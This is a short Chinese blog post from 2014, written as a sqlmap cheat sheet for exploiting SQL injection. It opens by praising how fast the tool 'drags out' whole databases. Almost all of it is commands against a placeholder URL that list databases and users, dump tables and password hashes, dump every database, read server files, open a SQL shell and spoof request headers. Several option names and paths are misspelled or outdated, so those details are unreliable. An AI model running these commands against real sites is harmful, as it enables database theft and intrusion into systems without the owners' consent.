SQLMAP是一款开源的渗透测试程序,它可以自动探测和利用SQL注入漏洞来获得我们想要的数据。我们可以利用它执行特定的命令、查看文件、获取各种数据;当然,最猥琐的是它利用注入点拖库的速率还是灰常让人满意的。
 
#>  ./sqlmap.py -u “注入地址” -v 1 --dbs   // 列举数据库 
 
#> ./sqlmap.py -u “注入地址” -v 1 --current-db   // 当前数据库
 
#>./sqlmap.py -u “注入地址” -v 1 --users    // 列数据库用户
 
#>  ./sqlmap.py -u “注入地址” -v 1 --current-user  // 当前用户
 
#>  ./sqlmap.py -u “注入地址” -v 1 --tables -D “数据库”   // 列举数据库的表名
 
#> ./sqlmap.py -u “注入地址” -v 1 --columns -T “表名” -D “数据库”   // 获取表的列名
 
#>./sqlmap.py -u “注入地址” -v 1 --dump -C “字段,字段” -T “表名” -D “数据库”   // 获取表中的数据,包含列 
 
已经开始拖库了,SQLMAP是非常人性化的,它会将获取的数据存储sqlmap/output/中、
 
MySQL数据库举例:
 

1) 判断当前用户是否是dba
    python sqlmap.py -u "url" --is-dba -v 1

2) --users:列出数据库管理系统用户
    python sqlmap.py -u "url" --users -v 0

3) --passwords:数据库用户密码(hash)
    python sqlmap.py -u "url" --passwords -v 0
    python sqlmap.py -u "url" --passwords -U sa -v 0

4) 查看用户权限
    python sqlmap.py -u "url" --privileges -v 0
    python sqlmap.py -u "url" --privileges -U postgres -v 0

5) --dbs可以利用的数据库
    python sqlmap.py -u "url" --dbs -v 0

6) --tables列数据库表
    python sqlmap.py -u "url" --tables -D "information_scheam"

    -D:指定数据名称

7) --columns 列出表中的列名
    python sqlmap.py -u "url" --columns -T "user" -D "mysql" -v 1

    -T:指定表名,-D:指定库名

8) --dump列表中指定列的内容
    python sqlmap.py -u "url" --dump -T "users" -D "testdb"
    -C:可以指定字段

    指定列的范围为2到4
python sqlmap.py -u "url" --dump -T "users" -D "testdb"  --start 2 --stop 4 -v 0

9) --dumap-all列出所有数据库,所有表内容
    python sqlmap.py -u "url" --dump-all -v 0

    只列出用户自己新建的数据库和表的内容

    python sqlmap.py -u "url" --dump-all --exclude-sysdbs -v 0

10) --file读取文件内容[load_file()函数]
      python sqlmap.py -u "url" --file /etc/password

11) 执行SQL
      python sqlmap.py -u "url" --sql-shell

12) -p 指定参数
      python sqlmap.py -u "url" -v 1 -p "id"

      -p可以指定多参数-p "cat,id"

13) POST提交
      python sqlmap.py -u "url" --method POST --data "id=1"

14) COOKIE提交
      python sqlmap.py -u "url" --cookie "id=1" -v 1

      cookie值可以由TamperData抓取

15) refer欺骗

      python sqlmap.py -u "url" --refer "url" -v 3

16) 使用自定义user-agent或者user-agents.txt
      python sqlmap.py -u "url" --user-agent "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" -v 3

      python sqlmap.py -u "url" -v 1 -a "./txt/user-agents.txt"

17) 使用多线程猜解
      python sqlmap.py -u "url" -v 1 --current-user --threads 3

18) 指定数据库,绕过SQLMAP的自动检测
      python sqlmap.py -u "url" -v 2 --dbms "PostgreSQL"

19) 指定操作系统绕过SQLMAP自动检测
      python sqlmap.py -u "url" -v 2 --os "Windows"

20) --prefix and --postfix自定义payload
      python sqlmap.py -u "url" -v 3 -p "id" --prefix "'" --postfix "and 'test'='test"

21) union注入测试
      python sqlmap.py -u "url" --union-test -v -1

22) 配合order by
      python sqlmap.py -u "url" --union-test --union-tech orderby -v 1

23) python sqlmap.py -u "url" -v 1 --union-use --banner

24) python sqlmap.py -u "url" -v 5 --union-use --current-user

25) python sqlmap.py -u "url" -v 1 --union-use --dbs

posted on 2014-03-28 20:22  milantgh  阅读(3385)  评论(0编辑  收藏  举报